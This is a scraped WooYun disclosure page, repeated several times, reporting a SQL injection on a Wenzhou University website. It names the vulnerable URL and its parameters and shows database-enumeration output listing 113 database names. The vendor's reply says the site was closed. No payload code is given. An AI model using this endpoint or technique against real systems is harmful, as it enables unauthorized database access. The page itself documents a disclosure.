温州大学某站sql注入（113库） | wooyun-2016-0226572| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0226572

漏洞标题：温州大学某站sql注入（113库）

漏洞作者：路人甲

提交时间：2016-07-06 16:53

修复时间：2016-07-08 10:33

公开时间：2016-07-08 10:33

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-07-06：细节已通知厂商并且等待厂商处理中
2016-07-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

漏洞url:
http://jpkc.wzu.edu.cn/xhyxt/col_tsjx/detail.aspx?tid=25&ID=751

漏洞证明：

$5EZ_K68L_G@R{IFDU7OVS2S.png$

available databases [113]:
[*] 0fojn
[*] 2012tw_wzu_edu_cn
[*] admission_zizhu
[*] adver_wzu_edu_cn
[*] appraisal
[*] bqxq
[*] bwc
[*] CourseStudy
[*] csjjjc
[*] cslabapp
[*] csrenwen
[*] cswedaitlab
[*] cswzdxjldzc
[*] cswzdxjpkcxzlkc
[*] csyunfei
[*] cwcx_wzry
[*] CYJY_WZU_EDU_CN
[*] Daxuewuli
[*] dfgx
[*] dhlai
[*] Diy
[*] dqTB1tiwso8hlaVj
[*] dwzzb
[*] dxwlsy
[*] ep
[*] exuequ
[*] fazhengxy
[*] fzghc_com
[*] fzxy_cxzy
[*] gdhy
[*] ggty
[*] gongfang
[*] gyzc_wzu_edu
[*] house
[*] hqjt_wzu_edu_cn
[*] hqzyw
[*] htwlgcjs
[*] huaxueyiji
[*] hum
[*] hxsysfzx
[*] ieapp
[*] jgdzyjs
[*] jghx
[*] jjyzz1
[*] jnjp
[*] JPKC_CYSW
[*] JPKC_DJCL2010
[*] JPKC_GJG
[*] JPKC_HGKC
[*] jpkc_hlm
[*] jpkc_iet
[*] jpkc_isd
[*] jpkc_jdgc
[*] jpkc_tybj
[*] jpkc_wzu_edu_dxyd
[*] jpkc_wzu_hgylyouyan
[*] jpkc_wzu_wangqiu
[*] jpkc_wzu_zq
[*] jpkc_xdwlhx
[*] jpkc_xqjyjs
[*] jpkc_xxjsjxf
[*] jpkc_ycx
[*] jpkc_zxsxjxjn
[*] jpkccx
[*] jwc
[*] jxzh
[*] jyjxjpkc
[*] KAOBO_CHEM_WZU_EDU_CN
[*] kfpt
[*] kjcgz
[*] lahz
[*] lanqiu
[*] lcf
[*] lgbcom
[*] liuxuew_com
[*] luoshan
[*] master
[*] math_wzu_edu_cn
[*] met
[*] mobileieee
[*] model
[*] msdb
[*] nettesting
[*] network
[*] newmath
[*] paiqiu
[*] peilab
[*] PGPT_ZJ_CN
[*] psy_wzu_edu_cn
[*] qzlx
[*] ReportServer
[*] ReportServerTempDB
[*] router
[*] rtdj
[*] science
[*] scxq
[*] SiteFactory
[*] sj
[*] skc2012
[*] skc_wzu_edu_cn
[*] sq_jyxyl
[*] sq_sxjxyl
[*] suchu_wzu_edu_cn
[*] swxjxl
[*] sysglw
[*] sysj
[*] szb_wzu_edu_cn
[*] tempdb
[*] tiyu_jpkc_jmcjxw
[*] tiyu_jpkc_wushu
[*] tiyu_jpkc_xtjmc
[*] tiyu_jpkc_ystc
[*] tiyu_wzu_edu_cn_jpkc_jmc

修复方案：

我不会这个的

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2016-07-08 10:33

厂商回复：

该网站，已经被我校现代教育技术中心关闭

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0226572

漏洞标题：温州大学某站sql注入（113库）

相关厂商：wzu.edu.cn

漏洞作者：路人甲

提交时间：2016-07-06 16:53

修复时间：2016-07-08 10:33

公开时间：2016-07-08 10:33

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0226572

漏洞标题：温州大学某站sql注入（113库）

相关厂商：wzu.edu.cn

漏洞作者： 路人甲

提交时间：2016-07-06 16:53

修复时间：2016-07-08 10:33

公开时间：2016-07-08 10:33

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0226572"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云